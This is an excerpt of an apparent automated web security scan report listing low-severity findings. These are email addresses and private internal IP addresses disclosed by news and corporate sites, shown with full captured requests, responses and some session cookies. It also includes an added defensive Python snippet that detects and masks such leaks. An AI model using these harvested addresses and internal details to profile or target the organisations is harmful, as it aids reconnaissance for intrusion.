<html xmlns:meebo="http://www.meebo.com" lang="en">


<head>
       <title>Rokeyta Roberson: spar
...[SNIP]...
<a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a>
...[SNIP]...

24.12. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The following email address was disclosed in the response:

Request

GET /trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:28 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11371
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: notre dame football, Sep
...[SNIP]...
<div class="gs-snippet">
BY NEIL HAYES nhayes@suntimes.com September 2, 2011 1:52PM It was a short post-practice press conference with coach Brian Kelly on Thursday, but he made a coupl.
</div>
...[SNIP]...

24.13. http://www.idg.com/www/rd.nsf/rd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idg.com
Path:   /www/rd.nsf/rd

Issue detail

The following email address was disclosed in the response:

Request

GET /www/rd.nsf/rd HTTP/1.1
Host: www.idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5062
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<a href="mailto:questions@idg.com">
...[SNIP]...

24.14. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Issue detail

The following email address was disclosed in the response:

Request

GET /sports/la-sp-0903-usc-charticle-20110903,0,2387944.story HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z2n1
Last-Modified: Sun, 04 Sep 2011 01:26:14 GMT
Cache-Control: private, max-age=177
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 207445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transiti
...[SNIP]...
<a href="mailto:gary.klein@latimes.com">gary.klein@latimes.com</a>
...[SNIP]...

24.15. http://www.newslibrary.com/nlsearch.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newslibrary.com
Path:   /nlsearch.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /nlsearch.asp HTTP/1.1
Host: www.newslibrary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:21 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="NewsLibrary"
Set-Cookie: ARCH_HOST=nl.newsbank.com; path=/; domain=.newsbank.com;
Connection: close
Content-Type: text/html
Content-Length: 1910


<html><head>
<title>NewsLibrary Error</title>
</head>
<body>
<map name="FPMap0">
<area href="/nlsite/faq.htm" shape="rect" coords="386, 20, 429, 37">
<area href="/nlsite/about.htm" shape="rect" coor
...[SNIP]...
<A HREF="mailto:newslibrary@newsbank.com">contact NewsBank</A> (newslibrary@newsbank.com) about the problem.
</font>
...[SNIP]...

24.16. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: www.sacbee.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 96501
Expires: Sun, 04 Sep 2011 00:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:57:44 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a href="mailto:feedback@sacbee.com">feedback@sacbee.com</a>
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.17. http://www.sacbee.com/classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams

Issue detail

The following email addresses were disclosed in the response:

Request

GET /classified-ads/Obituaries%20&%20In%20Memoriams/classification/In%20Memoriams HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:27:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121640


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>

<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new Da
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<!-- If you do not know your affiliate code, then contact cobrandedsites@cars.com -->
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.18. http://www.sacbee.com/mr/b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /mr/b.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /mr/b.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.19. http://www.sacbee.com/mr/e.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /mr/e.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /mr/e.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.20. http://www.sacbee.com/mr/f.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /mr/f.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /mr/f.gif HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.21. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The following email addresses were disclosed in the response:

feedback@sacbee.com
you@yahoo.com (placeholder text in a form hint)
content@www.sacbee.com

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<span class="exmpl">ex: &quot;you@yahoo.com&quot;</span>
...[SNIP]...
<p>To register a complaint about another user's conduct, please send an e-mail message to content@www.sacbee.com, or write to Customer Service, www.sacbee.com, [-YOUR_ADDRESS-].</p>
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.22. http://www.sacbee.com/reg-bin/tint.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/tint.cgi

Issue detail

The following email address was disclosed in the response:

feedback@sacbee.com

Request

GET /reg-bin/tint.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds019p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...
<a href="mailto:feedback@sacbee.com">
...[SNIP]...

24.23. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /assets/scripts/analytics/voc/surveyLogic.js

Issue detail

The following email address was disclosed in the response (in a developer comment block at the top of the script):

jasone@numericanalytics.com

Request

GET /assets/scripts/analytics/voc/surveyLogic.js HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:08:53 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Mon, 11 Oct 2010 20:38:40 GMT
ETag: "2f09b8-4339-4925d586d1400"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 17209
Content-Type: application/x-javascript

/****************************************
* Sprint Analytics Control File
* Designed and Developed by Numeric Analytics
*
* Lead Developer: Jason Eves jasone@numericanalytics.com
*
*
* Purpose: This code is meant to control
* the various aspects of web analytics for
* Sprint.com
*
* Logic for Voice of Customer survey system
*************************************
...[SNIP]...

24.24. http://www.sprint.com/legal/agreement.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /legal/agreement.html

Issue detail

The following email address was disclosed in the response:

abuse@sprint.net

Request

GET /legal/agreement.html HTTP/1.1
Host: www.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:46 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Sprint | Acceptable Use Policy and Visitor Agreement
...[SNIP]...
<a href="mailto:abuse@sprint.net">abuse@sprint.net</a>
...[SNIP]...
<a href="mailto:abuse@sprint.net">abuse@sprint.net</a>
...[SNIP]...

24.25. http://www.sprint.com/legal/copyright.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /legal/copyright.html

Issue detail

The following email address was disclosed in the response:

copyrightnotice@sprint.com

Request

GET /legal/copyright.html HTTP/1.1
Host: www.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:50 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>Sprint | Copyright and Trademark Notices</title>
...[SNIP]...
<a href="mailto:copyrightnotice@sprint.com">copyrightnotice@sprint.com</a>
...[SNIP]...

24.26. http://www.usatoday.com/marketing/feedback.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /marketing/feedback.htm

Issue detail

The following email address was disclosed in the response:

accuracy@usatoday.com

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35984
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCACSACD=JEHEEDFBBDOBLPCOJAALENNI; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- EdSysObj ID="script_container0" FRAGMENTID="" --><!-- /EdSysObj -->
<sc
...[SNIP]...
<a href="mailto:accuracy@usatoday.com">accuracy@usatoday.com</a>
...[SNIP]...

24.27. http://www.usatoday.com/marketing/questions.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /marketing/questions.htm

Issue detail

The following email addresses were disclosed in the response:

emailnewsletters@usatoday.com
researchline@usatoday.com
permissions@usatoday.com
sales@scoopreprintsource.com
headlines@usatoday.com
feedback@feedroom.com
editor@usatoday.com
accuracy@usatoday.com

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79083
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQCSTTD=HFENPINAOJGOOPKGOLAKELOM; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:34 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">OAS_listpos =
"InvCount,PageCount,AdOps1,Top7
...[SNIP]...
<a href="mailto:emailnewsletters@usatoday.com">emailnewsletters@usatoday.com</a>
...[SNIP]...
<A href="mailto:researchline@usatoday.com">ResearchLine@usatoday.com</A>
...[SNIP]...
<A href="mailto:permissions@usatoday.com">permissions@usatoday.com</A>
...[SNIP]...
<A href="mailto:sales@scoopreprintsource.com">sales@scoopreprintsource.com</A>
...[SNIP]...
<a href="mailto:headlines@usatoday.com">headlines@usatoday.com</a>
...[SNIP]...
<a href="mailto:feedback@feedroom.com">
...[SNIP]...
<a href="mailto:editor@usatoday.com">editor@usatoday.com</a>
...[SNIP]...
<a href="mailto:accuracy@usatoday.com">accuracy@usatoday.com</a>
...[SNIP]...

25. Private IP addresses disclosed
There are 31 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
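As an added example (not part of the scanner output above), the following Python performs the same check the scanner applied to the responses in this section, reporting RFC 1918 addresses wherever they occur in a raw HTTP response, both in header values (the X-FB-Server and X-Digg-Time cases below) and in the entity body, and then shows the remediation suggested above: rewriting a back-end-identifying header to an opaque, stable token that operators can still correlate but from which an attacker learns nothing. The two sample responses are constructed for the example and modelled on the findings that follow; the header name argument and the HMAC key are assumptions for the illustration, not anything taken from the page.

```python
import hashlib
import hmac
import ipaddress
import re
from typing import List, Tuple

# The three RFC 1918 ranges, listed explicitly. ipaddress's is_private is wider
# (loopback, link-local, documentation and other reserved ranges), so relying
# on it would over-report for this particular finding.
RFC1918_NETS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)

# A dotted quad not glued to neighbouring digits or dots, so "10.1.2.3.4" and
# version strings do not yield candidates; octet range is validated afterwards.
_DOTTED_QUAD = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def is_rfc1918(addr: str) -> bool:
    """True if addr is a syntactically valid IPv4 address inside an RFC 1918 range."""
    try:
        ip = ipaddress.IPv4Address(addr)
    except ipaddress.AddressValueError:  # e.g. an octet above 255
        return False
    return any(ip in net for net in RFC1918_NETS)


def _split_response(raw: str) -> Tuple[List[str], str, str]:
    """Normalise line endings and split a raw HTTP response into
    (header lines including the status line, separator, body)."""
    text = raw.replace("\r\n", "\n")
    head, sep, body = text.partition("\n\n")
    return head.split("\n"), sep, body


def find_private_ips(raw_response: str) -> List[Tuple[str, str]]:
    """Return (location, address) pairs for every RFC 1918 address in a response.

    location is 'header:<Name>' for a header value and 'body' for the entity
    body, which is how a scanner reports where the disclosure sits.
    """
    lines, _, body = _split_response(raw_response)
    hits: List[Tuple[str, str]] = []
    for line in lines[1:]:  # lines[0] is the status line
        name, colon, value = line.partition(":")
        if not colon:
            continue
        for m in _DOTTED_QUAD.finditer(value):
            if is_rfc1918(m.group(1)):
                hits.append((f"header:{name.strip()}", m.group(1)))
    for m in _DOTTED_QUAD.finditer(body):
        if is_rfc1918(m.group(1)):
            hits.append(("body", m.group(1)))
    return hits


def mask_backend_header(raw_response: str, header_name: str, secret: bytes) -> str:
    """Replace the value of header_name with an opaque, stable token.

    Operators holding `secret` can still tell which back end served a request
    (same original value -> same token), but the token carries no address.
    The key is a deployment assumption for this example; any server-side
    secret that is not exposed to clients will do.
    """
    lines, sep, body = _split_response(raw_response)
    out = []
    for line in lines:
        name, colon, value = line.partition(":")
        if colon and name.strip().lower() == header_name.lower():
            digest = hmac.new(secret, value.strip().encode(), hashlib.sha256).hexdigest()
            line = f"{name.strip()}: srv-{digest[:12]}"
        out.append(line)
    return "\n".join(out) + sep + body


# Constructed sample responses (not the captured ones on this page), shaped
# like the X-FB-Server and X-Digg-Time findings reported in this section.
SAMPLE_HEADER_LEAK = (
    "HTTP/1.1 302 Found\r\n"
    "Location: /docs/plugins\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "X-FB-Server: 10.28.35.105\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

SAMPLE_BODY_LEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Digg-Time: D=26937 10.2.129.225\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    '<html><body><span title="10.2.129.225 Build: 264">ok</span>\n'
    "<!-- 203.0.113.9 is public and 10.1.2.3.4 is not a valid quad --></body></html>\n"
)

if __name__ == "__main__":
    for label, sample in (("header", SAMPLE_HEADER_LEAK), ("body", SAMPLE_BODY_LEAK)):
        print(label, find_private_ips(sample))
    print(mask_backend_header(SAMPLE_HEADER_LEAK, "X-FB-Server", b"ops-only-key"))
```

Two caveats worth keeping in mind when running a check like this. First, `ipaddress.IPv4Address.is_private` is not the same test as "RFC 1918": it also returns true for loopback, link-local, the documentation prefixes and other reserved space, so a scanner that uses it will report things that are not internal addresses. Second, the X-FB-Server cases below are the load-balancing situation the remediation describes: a public edge answers the request, but the header names the individual back-end node behind it, which is exactly the kind of detail a keyed token hides while still letting operators trace a request to a host.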


25.1. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.28.35.105

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
Connection: close
Date: Sun, 04 Sep 2011 01:22:23 GMT
Content-Length: 0


25.2. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-Digg-Time header, and again in the page body):

10.2.129.225

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
<span title="10.2.129.225 Build: 264 - Fri Sep 2 18:08:38 PDT 2011 15.00ms">
...[SNIP]...

25.3. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header):

10.54.154.41

Request

GET /safe_image.php?d=AQCtSjS0nizY4oai&url=http%3A%2F%2Fad.doubleclick.net%2Fad%2Fmi.clt00%2FNews%2FLocal%3Batf%3DY%3Bdcove%3Dd%3Bpl%3Dstory%3Bsect%3DNewsLocalNews%3Bpos%3D1%3Bsz%3D300x250%3Btile%3D4%3B%21c%3Dnews%3Bpub%3DCharlotteObserver2%3Bord%3D75145674926123%3Bgender%3D%3Byear%3D%3Bincome%3D%3F HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.154.41
X-Cnection: close
Content-Length: 18431
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 00:44:50 GMT
Date: Sun, 04 Sep 2011 00:44:50 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

25.4. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

